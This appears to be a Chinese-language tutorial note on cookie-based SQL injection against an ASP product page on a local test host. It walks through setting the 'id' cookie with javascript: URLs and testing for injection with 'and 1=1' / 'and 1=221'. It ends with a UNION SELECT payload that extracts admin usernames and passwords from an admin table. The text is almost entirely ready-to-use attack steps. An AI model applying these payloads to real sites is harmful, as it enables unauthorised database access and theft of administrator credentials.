1.先訪問當前注入點文件名
2.修改cookie
javascript:alert(document.cookie="id="+escape("1137"));
把當前站點的cookie內容修改為id=260 並且彈窗顯示出當前的cookie內容
注入點:
http://127.0.0.1:800/asp/Production/PRODUCT_DETAIL.asp?id=1137
注入點文件名:
http://127.0.0.1:800/asp/Production/PRODUCT_DETAIL.asp?
javascript:alert(document.cookie="id="+escape("260"));
內容:document.cookie="id="+escape("260")
document.cookie //修改cookie
"id="+escape("260")
//id是咱們注入點的參數
260 //參數值
javascript //使用js語句
alert //彈出窗口,
javascript:alert(document.cookie="id="+escape("1137"));
把當前站點的cookie內容修改為id=260 並且彈窗顯示出當前的cookie內容
判斷是否存在注入
javascript:alert(document.cookie="id="+escape("1137 and 1=1"));
返回正常
javascript:alert(document.cookie="id="+escape("1137 and 1=221"));
返回錯誤
查詢指定管理員
javascript:alert(document.cookie="id="+escape("1137 union select 1,2,admin,4,5,6,7,8,9,10,11,12,13,14,password,16,17,18,19,20,21,22 from admin where id=40"));